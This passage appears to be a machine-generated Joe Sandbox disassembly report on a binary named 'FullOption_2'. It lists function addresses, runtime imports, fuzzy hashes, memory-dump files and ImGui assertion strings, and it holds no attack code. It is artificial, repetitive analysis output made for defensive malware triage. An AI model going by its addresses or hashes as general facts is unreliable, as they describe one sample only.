                                                                                  • Instruction ID: cc7258cabcb3777347f3208e67e42364ec8aead5982c78cb1e0fbdb808eca327
                                                                                  • Opcode Fuzzy Hash: 47a9054aa822baaecd87d7d62015d9a7781ae8c0eb9c3598a44f1242569bfaf0
                                                                                  • Instruction Fuzzy Hash: 5441F762A0AAC196E714EF26E5003B977A0FB6A748F082431FB4887295DF7CE1A4D704
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF6AE6F28C0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6AE6D25D2), ref: 00007FF6AE6F28ED
                                                                                    • Part of subcall function 00007FF6AE6F28C0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6AE6D25D2), ref: 00007FF6AE6F2916
                                                                                    • Part of subcall function 00007FF6AE6F28C0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6AE6D25D2), ref: 00007FF6AE6F293F
                                                                                    • Part of subcall function 00007FF6AE6F28C0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6AE6D25D2), ref: 00007FF6AE6F2974
                                                                                    • Part of subcall function 00007FF6AE6F28C0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6AE6D25D2), ref: 00007FF6AE6F299D
                                                                                    • Part of subcall function 00007FF6AE6F28C0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6AE6D25D2), ref: 00007FF6AE6F29C9
                                                                                    • Part of subcall function 00007FF6AE6F7390: _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF6AE6D25D2), ref: 00007FF6AE6F73E0
                                                                                    • Part of subcall function 00007FF6AE6F7390: _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF6AE6D25D2), ref: 00007FF6AE6F741A
                                                                                    • Part of subcall function 00007FF6AE6F7390: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF6AE6D25D2), ref: 00007FF6AE6F7447
                                                                                    • Part of subcall function 00007FF6AE6F7390: _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF6AE6D25D2), ref: 00007FF6AE6F7471
                                                                                    • Part of subcall function 00007FF6AE6F7390: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF6AE6D25D2), ref: 00007FF6AE6F749C
                                                                                    • Part of subcall function 00007FF6AE6F7390: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6AE6F74EF
                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6AE6D25FE
                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6AE6D2623
                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6AE6D2645
                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6AE6D2667
                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6AE6D2689
                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6AE6D26AB
                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6AE6D26CD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: free$_wassert
                                                                                  • String ID:
                                                                                  • API String ID: 94870348-0
                                                                                  • Opcode ID: 412afc7a0c8871ab334c8467ece4c2a79efbc5075c0631c7049a8e38574560d0
                                                                                  • Instruction ID: c9d5d403471e99eb3045cb44415d22512d4e26b93c75b7c71bde77230c7c8730
                                                                                  • Opcode Fuzzy Hash: 412afc7a0c8871ab334c8467ece4c2a79efbc5075c0631c7049a8e38574560d0
                                                                                  • Instruction Fuzzy Hash: DF311C25B1BB4392EE99AF2BD59063523A0FF65B41F587875EA1EC3660DF2CE450A300
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6D7966,?,?,?,00007FF6AE6D7409), ref: 00007FF6AE6D8150
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6D7966,?,?,?,00007FF6AE6D7409), ref: 00007FF6AE6D8186
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6D7966,?,?,?,00007FF6AE6D7409), ref: 00007FF6AE6D81BA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$i >= 0 && i < Size
                                                                                  • API String ID: 3234217646-608382026
                                                                                  • Opcode ID: ea9b1e1edd3bfc27d1bd147ce545204aa694940dd06da20719a2752399754336
                                                                                  • Instruction ID: ae96dadb392c0847fb9005a2fee4f405132b191b27d080dfda97a9487069d13f
                                                                                  • Opcode Fuzzy Hash: ea9b1e1edd3bfc27d1bd147ce545204aa694940dd06da20719a2752399754336
                                                                                  • Instruction Fuzzy Hash: 73219125B0AF8386E714DF57ECC846963A1FB68781F942436EA1EC3654CF6CE455CB00
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$font && font->IsLoaded()$font->Scale > 0.0f
                                                                                  • API String ID: 3234217646-3189553595
                                                                                  • Opcode ID: 462a0830b07ff688c524b9c4b7092da37d8bfbb9b137f85a2bd70da8530be030
                                                                                  • Instruction ID: 85849d47e9a5f0f417cead0d5896ee824d252c349890ac41800a3857fadc6db4
                                                                                  • Opcode Fuzzy Hash: 462a0830b07ff688c524b9c4b7092da37d8bfbb9b137f85a2bd70da8530be030
                                                                                  • Instruction Fuzzy Hash: 8D31A132616F8595E702DF2AD4801A873B4FF69B88F185731EA0C572A5DF38E195D700
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6E32C9,?,?,00000000,00007FF6AE6D94A9), ref: 00007FF6AE6E99AE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: <NULL>$D:\ALLLLREALSHY\src\$[focus] SetNavWindow("%s")$g.NavWindow != 0
                                                                                  • API String ID: 3234217646-1886120451
                                                                                  • Opcode ID: 100991de4537ea20ef5bced2fe6d4c019e2519d45a821884cc4c890670c0f4e1
                                                                                  • Instruction ID: 73c60cf48a4d0d5af6d9047252b9e683a9c5d2609a5049b4f8d636c109333bd6
                                                                                  • Opcode Fuzzy Hash: 100991de4537ea20ef5bced2fe6d4c019e2519d45a821884cc4c890670c0f4e1
                                                                                  • Instruction Fuzzy Hash: 6D11B15191FAC290EB10EB16E9443792BA0EF6AB44F0C68B5EB0D473E5DF6C94848304
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6EAD72), ref: 00007FF6AE6E9A0A
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6EAD72), ref: 00007FF6AE6E9A29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$g.NavWindow != 0$nav_layer == ImGuiNavLayer_Main || nav_layer == ImGuiNavLayer_Menu
                                                                                  • API String ID: 3234217646-1340843693
                                                                                  • Opcode ID: b4bd7d3ae35632e7af82c6034d731552fc562478eece44f6ddfdef1be3dfd660
                                                                                  • Instruction ID: b3e773c477d30c6c09194ea5f457cfdce4e2f898f6c541f3fe3ae18e574f17fc
                                                                                  • Opcode Fuzzy Hash: b4bd7d3ae35632e7af82c6034d731552fc562478eece44f6ddfdef1be3dfd660
                                                                                  • Instruction Fuzzy Hash: A5118B72A29BD185E710EF17E8402A97764FBA5B84F486432FE8D47768DF78D180CB40
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6F7BCD), ref: 00007FF6AE6F8013
                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6AE6F7BCD), ref: 00007FF6AE6F8034
                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6AE6F7BCD), ref: 00007FF6AE6F8055
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: free$_wassert
                                                                                  • String ID: !Locked && "Cannot modify a locked ImFontAtlas between NewFrame() and EndFrame/Render()!"$D:\ALLLLREALSHY\src\
                                                                                  • API String ID: 94870348-2185833214
                                                                                  • Opcode ID: 77bbb876db4bc29e506e279d353aa8d78a749c8c61ef021fd14ec12602d940a1
                                                                                  • Instruction ID: 3816e58acc294b9faf6bf668b20dbdba09cb9620f788f7488544b2dc007faf13
                                                                                  • Opcode Fuzzy Hash: 77bbb876db4bc29e506e279d353aa8d78a749c8c61ef021fd14ec12602d940a1
                                                                                  • Instruction Fuzzy Hash: 16014F21B17B0285EF54AF26D85023437A0FF68B44F4824B5EA0DC7350DF2DE495D340
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF6AE75D6E0: memcpy.VCRUNTIME140(?,?,?,00007FF6AE6D1CBA), ref: 00007FF6AE75D7CF
                                                                                    • Part of subcall function 00007FF6AE75D6E0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6AE75D7F3
                                                                                    • Part of subcall function 00007FF6AE75D6E0: ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,00007FF6AE6D1CBA), ref: 00007FF6AE75D85B
                                                                                    • Part of subcall function 00007FF6AE75D6E0: ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,00007FF6AE6D1CBA), ref: 00007FF6AE75D864
                                                                                    • Part of subcall function 00007FF6AE75D6E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6D1CBA), ref: 00007FF6AE75D7AE
                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00007FF6AE6D1D53), ref: 00007FF6AE714600
                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00007FF6AE6D1D53), ref: 00007FF6AE714607
                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00007FF6AE6D1D53), ref: 00007FF6AE71460E
                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00007FF6AE6D1D53), ref: 00007FF6AE714615
                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00007FF6AE6D1D53), ref: 00007FF6AE71461C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$D@std@@@std@@U?$char_traits@$??1?$basic_ios@??1?$basic_ostream@Concurrency::cancel_current_taskmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 3886125459-0
                                                                                  • Opcode ID: 565cd2a3487d2e150fea7d22e561a2d9d97824ab415e6a30d759c3ce2f6de87b
                                                                                  • Instruction ID: 94ed3e653abf8a1d9948c9923016f34b55a4b1d0f4f659ca74a8df9ba31b1c37
                                                                                  • Opcode Fuzzy Hash: 565cd2a3487d2e150fea7d22e561a2d9d97824ab415e6a30d759c3ce2f6de87b
                                                                                  • Instruction Fuzzy Hash: 6F6191B2A0AB8691EA00FF62E45837D7761EB21BC4F404435EB5C876A6EF7DE484C344
                                                                                  APIs
                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6D1CBA), ref: 00007FF6AE75D7AE
                                                                                    • Part of subcall function 00007FF6AE82CD48: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000000100000000,00007FF6AE75F2E3), ref: 00007FF6AE82CD62
                                                                                  • memcpy.VCRUNTIME140(?,?,?,00007FF6AE6D1CBA), ref: 00007FF6AE75D7CF
                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6AE75D7F3
                                                                                  • ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,00007FF6AE6D1CBA), ref: 00007FF6AE75D85B
                                                                                  • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,00007FF6AE6D1CBA), ref: 00007FF6AE75D864
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: D@std@@@std@@U?$char_traits@$??1?$basic_ios@??1?$basic_ostream@Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmallocmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 3045592230-0
                                                                                  • Opcode ID: d33fbce4457232e87e55dfc79be33b11692e36a1d13db1ebc69a4908b865188a
                                                                                  • Instruction ID: 356e2e6247845a4954d249dae8691fc179a4161e1d758525beadb6c24e43a0f8
                                                                                  • Opcode Fuzzy Hash: d33fbce4457232e87e55dfc79be33b11692e36a1d13db1ebc69a4908b865188a
                                                                                  • Instruction Fuzzy Hash: 6341B232B0AB8285EB54EB16E44036963A0FB64BA4F108635EB6D47BD5DF3CD492C340
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: free
                                                                                  • String ID:
                                                                                  • API String ID: 1294909896-0
                                                                                  • Opcode ID: d548b7e00fc666e5db470bcf0ebde02c3cffd72ed7e8d62b7b04767169fa5f47
                                                                                  • Instruction ID: 61192c9d43d4c38b5b412ef024b8eee27186499a2c1c9408fe0308e3ac9f1db4
                                                                                  • Opcode Fuzzy Hash: d548b7e00fc666e5db470bcf0ebde02c3cffd72ed7e8d62b7b04767169fa5f47
                                                                                  • Instruction Fuzzy Hash: 2831F436A16B4281EB14AF2AE54063873A4FF64F88F086935EE5D83B64DF3DD850E750
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassertmemcpy
                                                                                  • String ID: D:\ALLLLREALSHY\src\$_Path.Size == 0
                                                                                  • API String ID: 785382960-770518983
                                                                                  • Opcode ID: 4d07ab60e41943f2e1aefe4a55c330535ace28f06d422222a6faebabcf1735a5
                                                                                  • Instruction ID: f69180df871708848f1033bdf7393ddf4a8a1b7e61493b15dd5cc3b720803ece
                                                                                  • Opcode Fuzzy Hash: 4d07ab60e41943f2e1aefe4a55c330535ace28f06d422222a6faebabcf1735a5
                                                                                  • Instruction Fuzzy Hash: 43E1BE32914BC88AD322DF3BC4812E97760FF69798F09A716EE48576A4DF39E190D700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$font->ContainerAtlas->TexID == _CmdHeader.TextureId
                                                                                  • API String ID: 3234217646-47955722
                                                                                  • Opcode ID: e933230658a1086ff9792e01b4792915ee8d641255e8f4729869c80db38a6528
                                                                                  • Instruction ID: 96a17e9018823c6bcca0daa38a1722af5745d20d8c472dc13c24e09aa61d975e
                                                                                  • Opcode Fuzzy Hash: e933230658a1086ff9792e01b4792915ee8d641255e8f4729869c80db38a6528
                                                                                  • Instruction Fuzzy Hash: 56B19632915F8985E711DF3BD4802ACB3A0FF69798F19A721EE4C636A5DF38E0959700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
